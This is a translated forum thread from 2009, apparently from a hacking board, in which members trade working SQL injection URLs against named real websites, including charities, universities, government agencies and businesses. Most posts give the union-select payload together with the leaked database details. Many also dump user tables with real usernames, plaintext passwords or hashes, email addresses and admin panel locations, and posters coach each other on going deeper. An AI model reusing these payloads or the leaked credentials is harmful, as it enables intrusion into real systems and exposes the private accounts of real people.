http://www.billiard-service.ru/lamp.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9h2artif_d123456@www1.100mb .ru:h2artif_saites:5.0.45-community-log

PR: 6
amenez.phpnet.org
http://amenez.phpnet.org/Kam/volcano.php?id=11+union+select+1,concat_ws(0x3a,us er(),database(),version()),3,4,5,6,7
amenez2@10.0.0.84:amenez2:4.1.22-log

mailbrush
16.05.2009, 17:19
http://chocoisland.ru/chocolate.php?id=11+and+null+union+select+1,2,3,4, concat_ws(0x3a,user(),database(),version())
z92680_site@77.221.130.21:z92680_site:5.0.32-Debian_7etch6-log

Dimionx
16.05.2009, 19:49
onixvisn10.com

http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11

Version - 5 5.0.67-community-log
User - onixvisn_stfr1@localhost
DB - onixvisn_stfr1

Users:

http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,User_nick name,user_passwd,user_email),7,8,9,10,11+from+user s

Chuck Prickett:dcf24fe936aaf7ed828da2cef9901a60:visn10@i dleworth.com

Admin panel:

First you need to log in here - http://onixvisn10.com/login.php
And then go here - http://onixvisn10.com/admin/


Email Address - visn10@idleworth.com
Password - 2resume

Skofield
16.05.2009, 23:34
http://www.usmcoc.org {PR 6}
http://www.usmcoc.org/event.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--

5.0.67-community : vicom_usmcoc : vicom_usmcoc@localhost

tables:
http://www.usmcoc.org/event.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6+ from+information_schema.tables--

------------------------------------------------------------------------------------------------

http://www.fraudadvisorypanel.org {PR 5}
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,concat_ws(0x3a,vers ion(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--

4.1.22 : fap_events: fap_events@83.223.106.10

table users:
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,group_concat(userna me,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+u sers--

username : password
fap:apw4fap
testuser:testpword
Tamaryn:michael
MiaCampbell:Molly74

http://www.fraudadvisorypanel.org/newmembers/login.php

------------------------------------------------------------------------------------------------

http://www.monroenc.org {PR 5}
http://www.monroenc.org/events.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9--

version() - 5.0.67
database - monroenc
user - monroenc@localhost

beerhack
16.05.2009, 23:36
PR6
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,concat_ws(0x3a,user,passwo rd)+from+mysql.user/*
Database Version: 4.1.21-standard
Database name: gaston_db
User name: tltltl@info.umb.edu

root:00c8bef335a35d31

Maestus
17.05.2009, 01:54
www.sonybmgmusic.co.uk
Just a nice (in my opinion) injection..
Users and their passwords:
http://www.sonybmgmusic.co.uk/artists/annie_lennox'%20and%200%20union%20select%201,2,3,4 ,5,group_concat(concat_ws(0x3a,iu_id,iu_email,iu_p assword,iu_first_name)%20separator%20'%3Cbr%3E'),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20int ranet_users--%20

P.S. This is not a repost,
google site:forum.antichat.ru sonybmgmusic.co.uk/
the result gave the address
https://forum.antichat.ru/printthread.php?t=21336&page=617&pp=10
which contains a post by user Buddah:
"found a very interesting site)) I don't have much experience myself, maybe someone else will find it interesting too"
sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/* 0" - and that is almost nothing; there isn't even an injection here, because, apart from the other mistakes (which are present), first of all the + sign here does not pass as a space but as a literal '+' character, so for that reason alone there will be no order by in this form. I wrote this because someone accused me of posting a repost.

udman
17.05.2009, 03:15
{PR6}
http://www.effwa.org/main/page.php?number=72+UNI ON+SELECT+0,1,2,3,4,5,concat(table_name,0x0b,colum n_name),7,8,9,10,11,12,0x73716C696E6A666C643137,0x 73716C696E6A666C643137,0x73716C696E6A666C643137,0x 73716C696E6A666C643137+FROM+INFORMATION_SCHEMA.COL UMN S--


effwadbu@web-ppb.srv.lexi.net
5.0.67-log
effwa

{PR4}
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x 0b,vers ion(),user(),database()),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

5.0.67
holmesmillet@web01.vidar.com
vidarMain

All tables
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27+from+information_sch ema.columns

{PR6}
http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,conc at_ws(0x0b,user(),version(),dat abase()),4,5,6,7,8,9,10+--+

thecock@localhost
4.0.20-standard
tc21


http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,con cat_ws(0x0b,email,pas s),4,5,6,7,8,9,10+FROM+tc21.users+LIMIT+8500,1+--+

Users: 8500 people

HAXTA4OK
17.05.2009, 09:36
PR: 2

http://www.parcobelvedere.it/hotel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os)--&l=e

5.0.51a-5-log:PARCOBELVEDERE:PARCOBELVEDERE@r5d6.wp.wifisolu tion.it:debian-linux-gnu

Dimionx
17.05.2009, 11:47
www.chehaliscoral.com

http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,version(),user(),d atabase()),2/*

Version - 5.0.33:
User - chehaliscoral@localhost
DB - chehaliscoral

Users:

http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,id,password,email) ,2+from+users+limit+0,1/*

5:234:ryan

Admin panel:
http://www.chehaliscoral.com/admin

Username - ryan
Password - 234

winstrool
17.05.2009, 12:09
_http://www.floramed.ru/detailnews.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),user (),database())

4.0.27-log:flora@zvm14.host.ru:flora

_http://www.adameva.ru/index.php?link_n=6&id_theme=30012&page=1&id_section=923+union+select+concat_ws(0x3a,EMAIL_U SER,PASSWORD)+from+users+limit+1,1--&forum_desc=

KBALENKO@MAIL.RU:PUSHKA

HAXTA4OK
17.05.2009, 12:37
PR: 4

http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,version(),3,4,5,6,7--

users : http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,usern ame,password)),3,4,5,6,7+from+gestione_utente--




##############################################

http://estetika-it.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--

4.1.25:estetika_user@localhost:estetika_it

erihtoney
17.05.2009, 13:11
All India Oracle Users Group
Google PageRank : 4
http://www.aioug.org
/eventdetails.php?id=-5+union+select+1,2,3,concat_ws(0x20,version(),user (),
database()),5,6,7,8,9,10,11,12

version 5.0.67-msl-icd1-log
user aioug@localhost
database aioug_dbt


columns from users

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,column_name,
5,6,7,8,9,10,11,12+from+information_schema.columns +where+table_name=char(117,115,101,114,115)+limit+ 2,1

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2+from+information_schema.columns+where+table_name =
char(117,115,101,114,115)+limit+3,1

(email,pass)

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,
concat_ws(0x20,id,email,pass,website),5,6,7,8,9,10 ,11,12+from+users+limit+1,1

mailbrush
17.05.2009, 13:50
http://4e.plantphys.net/printer.php?ch=5&id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10

plantphy@localhost:plan tphys_4e:4.0.14-standard-log

DezMond™
17.05.2009, 15:28
PR5
http://sozmod.eawag.ch/cv.php?id=1+union+select+unhex(hex(TABLE_NAME))+fr om+information_schema.tables+/*+

PR5
http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass, email,tcid,tcname),4,5,6,7+from+tbltelecenter--
rajukhanal::rainakhanal::mahabir@gmail.com::1::Gho repani Telecenter

RU.coder
17.05.2009, 15:28
http://uac.unborn.at/forumv2.php?cat=4'+and+0+union+select+1,2,concat_w s(0x20,id,nick,pw,nname,icq,mail),4,5,6+from+users +where+id=1/*

Dagon
17.05.2009, 15:36
Astrakhan.ru

http://www.astrakhan.ru/humour/?cmd=read_full&id=%27+UNION+SELECT+1,2,3,4,password,6,7,8+FROM+as trakhan.portal_users+where+login=%27tHunder%27/*

DezMond™
17.05.2009, 16:04
http://ifisc.uib.es/publications/publications.php?id=-10+union+select+TABLE_NAME,2+from+information_sche ma.tables+limit+197,1000--

tables:
jos_users
user
virtual_users
virtual_domains
view_users
users
series_users
series
seminarios
turba_shares_users
nag_shares_users
mnemo_shares_users
ingo_shares_users
horde_users
wp_users
usuarios
All the tables are locked((

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+concat_ws(0x3a3a,user,password),2+ from+mysql.user--

erihtoney
17.05.2009, 16:07
http://audiovisuals.audio.uv.es/tau/producciones.php?action=prod&id=-9999+union+select+1,2,concat_ws(0x20,version(),
user(),database()),4,5,6,7,8,9,10,11,12

version 4.0.17-nt
user root@localhost
database tau

udman
17.05.2009, 16:12
http://www.romver.ru/services/services.php?razdel=-1117+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws(0x 0b,user(),dat abase(),version()),11,12

caramel@10.210.10.10
caramel
5.0.75-log

Nothing interesting in the tables, there is no admin panel

DezMond™
17.05.2009, 17:53
PR5
http://www.fraudadvisorypanel.org/newsite/publications.php?c_id=-1+union+select+1,2,username,password,id,6,7,8,9,10 ,11,12,13+from+members/*

davido1 leaden
Couldn't find the admin panel(

AlexSatter
17.05.2009, 17:54
http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+23,1/*
via column_name I found out that this table has id,login,password
I can't dig any further, my knowledge doesn't allow it yet...

tried: http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,login,4,5,6,7,8,9,10,11+from+ad min/*
doesn't work...

p.s. TIC 40
If anyone digs up something interesting, write me a PM, at least so I can understand what I did wrong.

HAXTA4OK
17.05.2009, 18:10
http://www.ma-consult.ru/public2.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--

4.0.27-log:fgtkmcby@localhost:fgtkmcby

warlok
17.05.2009, 18:11
AlexSatter, here you go

http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,concat_ws(0x3a,id,login,passwor d),4,5,6,7,8,9,10,11+from+birja_hosting_miheeff_ru .admin/*

your mistake was that the admin table was not in the DB the site runs under.

peton
17.05.2009, 18:12
http://www.izone.ru/soft_admin/go.php?action=home&id=3075-1+union+select+concat(version(),char(58),database( ),char(58),user())
It won't go any further, no idea what tables are there, it doesn't dig into information_schema. If anyone figures them out, write to me, ok
P.S.: look at the address bar ))

+++AndreyDevil+++
17.05.2009, 18:25
----------------
http://www.lhfa.louisiana.gov/news/news_detail.php?ID=-100'+union+select+1,2,3,4,5,6,7,8,9/*
----------------------------------
Database Version: 5.0.45
Database name: lhfa2
User name: lhfa@localhost
------------------------------------

/admin/

|----------------------------------|
admin : Lhfa$543
|----------------------------------|

HAXTA4OK
17.05.2009, 18:31
PR: 4

http://www.migrationhistory.com/ma/index.php?section=members&id=1+union+select+1,concat_ws(0x3a,version(),user( ),database())--

4.0.18:migrationhistory@srv102.webdeal.no:migratio nhistory

Dimionx
17.05.2009, 19:10
www.sh2all.com

http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,version(),user( ),database()),3,4,5

Version - 5.0.67-community
User - sh2all_protect@localhost
DB - sh2all_protect


Users table:

http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,id,username,pas shash,email),3,4,5+from+users


Nick - admin
Hash - e8438e60f23ca196598c540d2e5b6d4b
Email - eng.m7mod@hotmail.com


Admin table:

http://www.sh2all.com/down.php?id=-1098+union+select+1,group_concat(0x0b,username,pas sword),3,4,5+from+admin


locus:15963

admin:password


Admin panel
http://www.sh2all.com/admin.php?act=login

faza02
17.05.2009, 19:19
http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+version(),2,3

http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+username,2,3+from+cfaq_admin_crm
http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+password,2,3+from+cfaq_admin_crm
only, for some reason there's an error..

HAXTA4OK
17.05.2009, 21:21
my 100th post xDDD
http://www.akl-ma.net/members/success_stories/showdetials.php?id=1+union+select+1,2,concat_ws(0x 3a,version(),user(),database()),4,5,6,7,8,9--

4.1.22-standard:aklmanet_akluser@localhost:aklmanet_akl

ivanko.rus
17.05.2009, 21:41
http://www.latindex.unam.mx/larga.php?opcion=1&folio=9999999999+union+select+password+from+usuari o+--+
PostgreSQL

HAXTA4OK
17.05.2009, 22:15
PR: 3

http://hedgie.eu/ma/me/place/NHindex.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11,12,3,14,15,16,17,18 ,19,20,21,22--&cal=2

4.1.22-standard:hedgius2_mamb1@localhost:hedgius2_mamb1

###############################################

http://www.ma-pa.org/content.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--

5.0.32-Debian_7etch6:ma_pa_org@localhost:ma_pa_org

###########################################
a funny SQLi ))))) look in the path of the image that doesn't open )) you'll see

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+s elect+1,2,vers ion(),4,5--

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(table_name ),4,5+from+information_schem a.tables+group+by+table_s ema+ limit+1,1--

tables:
home,about,receipt,file,wmv,page,distributer,shopp ing_type,mycalendar,bullet,relations_news,iv,accou nt,reference,gallery,pictrue,download,system,news,
clients,sendnews,member,article,reference_type,gal lery_type,products,download_type,useronline,newsle tter,comment,shopping,menu,banner,relations,guestb ook,products_type,faq,users,od,contact,
shopping_reserve,monetary,banner_menu,relations_ar ticle

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(concat_ws(0x3a,use rname,pa ssword)),4,5+ from+users --

users:

grich:392607,admin:admin,test:test,9grich:1234,tom :tom,jeab:240600,PpP:74123698,Kathy:3316600,johnny bravo:113249223,
champ29:29121984,jaxx1860:jaxx1860,beerkabpom:0470 03591,MAX:15621234,unicon13:379158,babydoy2526:123 456789

DezMond™
18.05.2009, 15:49
PR5
http://www.mainepolicy.org/news/show.php?news_id=-259+union+select+1,concat(username,char(58),passwo rd,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14+fr om+users/*&category=1
Couldn't find the admin panel((

Rubaka
18.05.2009, 20:28
http://glastonburytrust.co.uk/news_detail.php?pID=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8

Database Version: 5.0.67-community
Database name: glastonb_db
User name: glastonb_db@localhost

In database glastonb_db found table users
1 : name
2 : email
3 : password
4 : status
5 : university

DezMond™
18.05.2009, 20:32
PR4
http://brml.technion.ac.il/publications.php?id=-3+union+select+1,version(),3,4,5+/*+
4.1.22-log

HAXTA4OK
18.05.2009, 22:38
http://pi.aq-central.com/roster.php?id=1+union+select+version()--

5.0.75-community-log

http://pi.aq-central.com/roster.php?id=1+union+select+group_concat(concat_w s (0x3a,usernam e,pass word))+from+use rs--

admin:admin,superJAYdude:baconbits1,Jason A. Churchill:888888,PositivePaul:FreeGeorgeSherrill,M arlin Man:Safari,DAMellen:dirtysocks


##############################################
PR 4

http://www.zeva.com.au/registry.php?id=-1'+u nion+select+1,2,3,4,5,versio n(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33+--+

5.0.67


http://www.zeva.com.au/registry.php?id=-1'+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+from+information_sche ma.tables+group+by+table_schema+limit+4,1+--+

we get the tables via limits

DezMond™
19.05.2009, 00:03
http://www.strawtec.com.au/content.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,password),10,11,12+from+users+--+&ch=FAQ
strawtecadmin:snowfall88
P.S. there is an admin panel but the password doesn't fit((

http://www.austraumaconference.org/content.php?id=-2'+union+select+1,2,3,4,5,version()+--+
4.1.22

Rubaka
19.05.2009, 00:21
http://www.vnrhcs.org/news_detail.php?id=26+UNION+SELECT+1,2,3,4,5,6,7,8 ,9+limit+1,1/*

Database Version: 4.1.14-standard
Database name: vnr
User name: vnr@lsh209.chi.us.siteprotect.com

Kimliksiz
19.05.2009, 01:12
http://www.atriumtower.com/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

1
4.0.27

2

Kimliksiz
19.05.2009, 02:21
http://www.ukurier.gov.ua/index.php?p=-4+union+select+1,concat_ws(0x3a,login,password),3+ from+users+limit+31,1&id=4

olgas:5b708c065dfab38528050a84d852bf13 pass : 10610

Kimliksiz
19.05.2009, 02:23
http://bender.samaratoday.ru/webpage.php?id=6+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT(Version(),Database(),User()),0x71),0x71 )+LIMIT+1,1/*

Database Version: 5.0.45-log
Database name: samaratoda_ben
User name: samaratoda_ben@localhost

nemaniak
19.05.2009, 08:54
PR5

http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,version(),6,7,8--

5.0.68-log

http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,concat_ws(char(58),nome_ut ente,password),6,7,8+from+amministrazione--

ilias:4ea4bb924a73da2829c38c88b45eb85a
maria:b8fb37612c3cda3e341e12386a279b49
roberto:c6cc8094c2dc07b700ffcc36d64e2138

Didn't find the admin panel(

Kimliksiz
19.05.2009, 14:25
MySQL


http://nouvelivoire.com/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.67-community



http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.32-Debian_7etch3~bpo31+1-log
--------------------------------------------------------------------------------

10 WIB

5

Krist_ALL
19.05.2009, 15:17
IP network test & monitoring solutions

PR 3

http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

version() - 5.0.45-log

PASS - 68faf6fe5f3d85c6 mysql hash
Login - could not be determined
//some kind of partial access to information_schema...

Rav1n
19.05.2009, 15:51
http://www.digitalfunnies.com/item.php?item_no=-17+union+select+1,2,3,cast(concat_ws(0x3a,version( ),database(),user())+as+binary),5,6,7,8,9,10--

4.1.16-standard-log:comicscans:comicscans@cyrax.dreamhost.com

==================

http://www.kupi-jeftinije.com/item.php?id=-266+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9--

4.1.22-standard-log:kupijeft_kupi:kupijeft_kupi@localhost

Krist_ALL
19.05.2009, 17:10
http://www.vats.gov.gh/newsdetails.php?ID=-20+union+select+1,username,password,4,5,6+from+use rs+limit+0,1+--


montero -business - kmantey@gmail.com
kwamedankyi -hello2day - kwame.dankyi@vats.gov.gh
both are admins.
No admin panel found....

PR 5

Rednoise
19.05.2009, 17:51
http://www.seo-cms.ru/news_article.php?id=-2692+union+select+version(),2,user(),4,database(), 6/*

4.1.20-lk-log:skvitrru_seo:skvitrru_seo@localhost

when building further queries to select from the tables it redirects to another site, looks like some kind of filter is in place, no idea; whoever is interested, poke around

Krist_ALL
19.05.2009, 18:04
http://www.yp.md/news2/news.php?id=-261+union+select+1,2,3,4,version(),6,user(),8,9,10 ,11,12+--

PR 4

user() - ypmd_tester@localhost
version() - 5.0.67-community-log

there is a user_info table, but there is nothing interesting in it....

AlexSatter
19.05.2009, 18:46
http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),version(),database()),11,12,13,14,15,16,17

valdis_valdis@localhost:5.0.77-community:valdis_valdis

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11, 12,13,14,15,16,17+from+information_schema.tables+l imit+x,1

didn't find anything interesting in the databases.
PR4, TIC 50

http://www.bank45.ru/site.php?id=-10028+union+select+concat_ws(0x3a,version(),user() ,database())/*

http://www.bank45.ru/site.php?id=-10028+union+select+login+from+users/*

the data is output in the title

I also found this:
http://www.bank45.ru/users/
I especially liked what happens when you go to ok.php :)

information can also be gleaned here:
http://www.bank45.ru/phpinfo.php

PR2 , TIC 10

savik143
19.05.2009, 19:25
http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

version() - 5.0.45-log access is fine, login admin, admin panel at /admin

Ctacok
19.05.2009, 20:42
http://www.massiveattack.com/blog.php?id=-657%20union%20select%201,2,3,4,5,6,CONCAT_WS(7,%20 user(),%20version(),%20database()),8,9.10,11,12,13 ,14,15,16,17,18,19,20,21%20/*

RulleR
19.05.2009, 21:14
[PR 6]
http://perkins.pvt.k12.ma.us/museum/area.php?id=35+and+substring(@@version,1,1)=3
[PR 4]
http://www.unitech-adc.us/product_info.php?id=41+and+substring(@@version,1,1 )=3

HAXTA4OK
19.05.2009, 22:20
Wow, how much has been posted already while I was on a day-long bender )))) well, let's go

PR: 5

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,ver sion(),3,4,5, 6,7,8,9,10--

5.0.68-log

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,grou p_concat(table_name),3,4,5,6,7,8,9,10+from+informa tion_schema.tables+group +by+table_schema+limit+1,1 --

tables :

about,commenti_iuk,items,order_list,users_prova,ad min,country,kind,press,video,artist,editoriale,new s,users, commenti,exhibitions,news_iuk,users_press

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,group_conca t(concat_ws(0x3a,nick,pa ss)),3,4,5,6,7,8,9,10+from+use rs--



##########################################
PR: 2

http://www.greenparksystem.it/eng/prodotti2.php?id=-1+union+select+1,2,concat_ws(0x3a,u ser(),database(),versio n()),4,5,6,7,8--

greenpark@localhost:greenpark:4.1.21

AlexSatter
19.05.2009, 23:38
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4

5.0.22:us5167f@localhost:pivomani_shops

http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,TABLE_NAME,3,4+from+information _schema.tables+limit+50,1

Trying to access: mysql.user
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,Password,3,4+from+mysql.user+wh ere+User=0x726F6F74
We get: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
hmm, a collation mismatch. let's encode the password in .. well, for example, hex
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,hex(Password),3,4+from+mysql.us er+where+User=0x726F6F74
we get: 31666466326136313036646134646139
converting back: 1fdf2a6106da4da9

At first the site made a decent impression, tidy and full of content, but it is vulnerable to SQL-INJ in practically every script...
by its metrics, the site is a zero...

one more site, a zero, just for the experience...
http://stistroy.ru/site.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8

5.0.67-log:u149824:u149824@10.10.153.196

via information_schema.tables you can see which tables exist, but there is nothing interesting. and the site is empty anyway.


http://www.proherm.ru/site.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8

4.1.22-log:wwwprohermru:proherm@fe42.hc.ru

http://www.proherm.ru/site.php?id=-3+union+select+1,login,3,4,5,6,7,8+from+accounts+l imit+1,1

login: proherm

but then it turned out this wasn't needed, I found:
http://www.proherm.ru/a/
where everything is accessible without passwords.


http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11,12,13,14,15,16,17

5.0.77-community:valdis_valdis:valdis_valdis@localhost

http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11,1 2,13,14,15,16,17+from+information_schema.tables+li mit+20,1
there are tables from 17 to 20, nothing related to users.


TIC 50, PR 1

Rav1n
20.05.2009, 07:36
http://www.tdnovator.com/item.php?division=2&id=-280+union+select+1,2,3,4,5,6,7,8,9,cast(concat_ws( 0x3a,version(),database(),user())+as+binary),11,12 ,13,14,15,16,17,18--

4.1.13a-nt-max-log:1gb_tdnovatordb:1gb_tdnovatordb@10.0.1.8

RulleR
20.05.2009, 11:24
[PR 5]
http://www.svoa.co.th/product_info.php?id=-70237+union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
4.0.15a-log:svoaweb:root@172.17.10.14

[PR 3]
http://www.pakman.com.ru/product_info.php?id=-125+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8--
4.1.22-standard-log:pakmanc_pakman:pakmanc_pakman@localhost

[PR 0]
http://rmshop.ru/product_info.php?id=1+union+select+1,concat_ws(0x3 a,version(),database(),user()),3,4,5,6,7,8,9,10,11 ,12--
4.1.22-log:wwwprinterovnet:printero@localhost

[PR 0]
http://www.valvesmanufacturer.cn/product_info.php?id=149+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
4.1.16-nt:glb1:glb1@bizcn-w85

[PR 0]
http://printerov.net/product_info.php?id=-40+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12--
4.1.22-log:wwwprinterovnet:printero@localhost

[PR 0]
http://printmag.ru/product_info.php?id=-211+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12--
4.1.22-log:wwwprinterovnet:printero@localhost

winstrool
20.05.2009, 11:42
_http://www.energyflashrecords.co.uk/catalogue/title.phtml?product_id=-24946+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user()),6,7,8,9,0,1,2,3,4,5,16+--

5.0.67-community:wiz_system:wiz_system@localhost

_http://www.webtrafficpromotions.com/product_detail.php?cid=3&pid=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,0,1,2,3,4,5,6--

5.0.77-community:webtraff_wtp1013:webtraff_wtp1013@localh ost

HAXTA4OK
20.05.2009, 15:23
http://www.e-n.it/index.php?id=1&lg=it&nav=0&art=-15709+union+select +1,2,3,4,5,6,7,8,9, version() ,11,12,13,14 --

5.0.68-log

http://www.e-n.it/index.php?id=1&lg=it&nav=0&art=-15709+uni on+select+1,2,3,4,5,6,7,8,9,group_concat(table_nam e),11,12,13,14+ from+information_schema.tables+group+by+table_sche ma+l imit+3,1--

there's a bunch of tables there)))) look through them via limit)

Kimliksiz
20.05.2009, 15:34
MySQL

http://www.jambi.net/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

Access denied for user 'jambi_henky'@'localhost' (using password: YES) in

Access denied for user 'jambi'@'localhost' (using password: NO) in


http://partungkoan.com/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--


http://www.sman1berastagi.sch.id/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--


Access denied for user 'land_landsmile'@'localhost' (using password: YES) in /

HAXTA4OK
20.05.2009, 15:37
http://www.imvtours.it/destinazioni.php?id=-1+uni on+select+1,2,ver sion()--

5.0.68-log

tables:

imv_agenzie,imv_destinazioni_cataloghi,imv_hotels, imv_pagine,imv_visual,
imv_cataloghi,imv_destinazioni_hotels,imv_link,imv _province,imv_curriculum,
imv_galleria,imv_newsletter_subscriber,imv_session i,imv_destinazioni,imv_homepage,imv_offerte,imv_ut enti

user tables: imv_utenti

users:
root:45c82027a4b39a24b8f91f86103eb741,admin:b49645 e33600a00808c51f5a0524db09,marco:c526eb06433395f66 61824dc8f43c3dc

nemaniak
20.05.2009, 15:51
PR3

http://www.altromolise.it/notizia.php?argomento=cronaca&articolo=-38385+union+select+1,2,3,4,5,6,concat(version(),ch ar(58),database(),char(58),user()),8,9,10,11,12,13 ,14,15,16,17,18,19,20--

4.0.30-standard-log:Sql11522_4:Sql11522@62.149.141.27

admins:
gianluca:mussolini
redazione: piccola
sandro:nove17

R1dex
20.05.2009, 16:10
http://europosuda.ru/shop/index.php?CID=-1+uniOn+Select+1,concat(login,0x3a,password)+from+ ssrusers--

HAXTA4OK
20.05.2009, 16:20
PR: 4

http://dottint.dicea.unifi.it/index.php?fuseaction=showareas&id=1&page=-16+union+select+version()--

5.0.51a-24

tables:
work_student,introduction,posts,forum_mods,video,l iens,themes,document,reponses,catagories,posts_tex t,
access,whosonline,forums,liste_domaines,topics,exe rcice_question,sessions,config,priv_msgs,accueil,w ords,
group_properties,mc_scoring,exercices,user_group,s tat_accueil,course_description,questions,agenda,wo rk,
headermetafooter,pages,forum_access,users,student_ group,disallow,ranks,banlist

http://dottint.dicea.unifi.it/index.php?fuseaction=showareas&id=1&page=-16+union+select+group_concat(concat_ws(0x3a,user,p as sword,file_priv))+from+mysql. user+group+b y+file_priv+limit+1,1--

file_priv : Y

